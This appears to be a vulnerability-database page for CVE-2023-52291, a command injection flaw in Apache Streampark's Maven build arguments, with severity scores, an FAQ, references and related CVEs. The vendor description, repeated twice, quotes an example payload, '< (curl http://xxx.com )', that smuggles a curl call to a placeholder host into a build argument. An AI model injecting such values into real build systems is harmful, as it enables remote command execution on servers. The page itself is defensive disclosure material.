CVE-2023-52291
CVE-2023-52291 is a medium-severity vulnerability in Apache Streampark with a CVSS 3.x base score of 4.7. It is not currently listed as actively exploited by CISA, and its EPSS exploit-prediction score is low. The underlying weakness is classified as CWE-77.
Key facts
- Severity: Medium (CVSS 3.x base score 4.7)
- EPSS exploit prediction: 2% (73rd percentile)
- Actively exploited: Not listed in CISA KEV
- EU (EUVD) id: EUVD-2023-56962
- Weakness: CWE-77
- Affected product: Apache Streampark
- Published:
- Last modified:
Description
In streampark, the project module integrates Maven's compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low. Background: In the "Project" module, the maven build args “<” operator causes command injection. e.g : “< (curl http://xxx.com )” will be executed as a command injection, Mitigation: all users should upgrade to 2.1.4, The "<" operator will blocked。
Frequently asked questions
- What is CVE-2023-52291?
- In streampark, the project module integrates Maven's compilation capabilities. The input parameter validation is not strict, allowing attackers to insert commands for remote command execution, The prerequisite for a successful attack is that the user needs to log in to the streampark system and have system-level permissions. Generally, only users of that system have the authorization to log in, and users would not manually input a dangerous operation command. Therefore, the risk level of this vulnerability is very low. Background: In the "Project" module, the maven build args “<” operator causes command injection. e.g : “< (curl http://xxx.com )” will be executed as a command injection, Mitigation: all users should upgrade to 2.1.4, The "<" operator will blocked。
- How severe is CVE-2023-52291?
- CVE-2023-52291 has a CVSS 3.x base score of 4.7, rated medium severity. It is exploitable over network with low attack complexity, requires high privileges and no user interaction. Impact on confidentiality is low, integrity low, and availability low.
- Is CVE-2023-52291 being actively exploited?
- It is not currently listed in CISA's KEV catalog. Its EPSS exploit-prediction score is 2% (73rd percentile), an estimate of the probability of exploitation in the next 30 days.
- What products are affected by CVE-2023-52291?
- CVE-2023-52291 affects Apache Streampark. See the affected-products list for the exact vulnerable versions.
- How do I fix CVE-2023-52291?
- Review the linked vendor and NVD advisories for patched versions and mitigations, then upgrade or apply the recommended workaround.
- Does CVE-2023-52291 have an EU (EUVD) identifier?
- Yes. CVE-2023-52291 is tracked in the ENISA EU Vulnerability Database (EUVD) as EUVD-2023-56962.
- When was CVE-2023-52291 published?
- CVE-2023-52291 was published on 2024-07-17 and last updated on 2026-06-17.
References
- http://www.openwall.com/lists/oss-security/2024/07/17/1
- https://lists.apache.org/thread/pl6xgzoqrl4kcn0nt55zjbsx8dn80mkf
Affected products (1)
- cpe:2.3:a:apache:streampark:*:*:*:*:*:*:*:*
More vulnerabilities in Apache Streampark
- CVE-2025-54947 — Critical (CVSS 9.8): In Apache StreamPark versions 2.0.0 through 2.1.7, a security vulnerability involving a hard-coded encryption key…
- CVE-2022-45802 — Critical (CVSS 9.8): Streampark allows any users to upload a jar as application, but there is no mandatory verification of the uploaded file…
- CVE-2024-29070 — Critical (CVSS 9.1): On versions before 2.1.4, session is not invalidated after logout. When the user logged in successfully, the Backend…
- CVE-2022-46365 — Critical (CVSS 9.1): Apache StreamPark 1.0.0 before 2.0.0 When the user successfully logs in, to modify his profile, the username will be…
- CVE-2024-29178 — High (CVSS 8.8): On versions before 2.1.4, a user could log in and perform a template injection attack resulting in Remote Code…
- CVE-2023-52290 — High (CVSS 8.1): In streampark-console the list pages(e.g: application pages), users can sort page by field. This sort field is sent…
All CVEs affecting Apache Streampark →
Other CWE-77 (Command Injection) vulnerabilities
- CVE-2026-23652 — Critical (CVSS 10.0): Improper neutralization of special elements used in a command ('command injection') in Microsoft Power Pages allows an…
- CVE-2025-59818 — Critical (CVSS 10.0): This vulnerability allows authenticated attackers to execute arbitrary commands on the underlying system using the file…
- CVE-2025-64093 — Critical (CVSS 10.0): Remote Code Execution vulnerability that allows unauthenticated attackers to inject arbitrary commands into the…
- CVE-2025-64090 — Critical (CVSS 10.0): This vulnerability allows authenticated attackers to execute commands via the hostname of the device.
- CVE-2025-61492 — Critical (CVSS 10.0): A command injection vulnerability in the execute_command function of terminal-controller-mcp 0.1.7 allows attackers to…
- CVE-2025-10035 — Critical (CVSS 10.0): A deserialization vulnerability in the License Servlet of Fortra's GoAnywhere MFT allows an actor with a validly forged…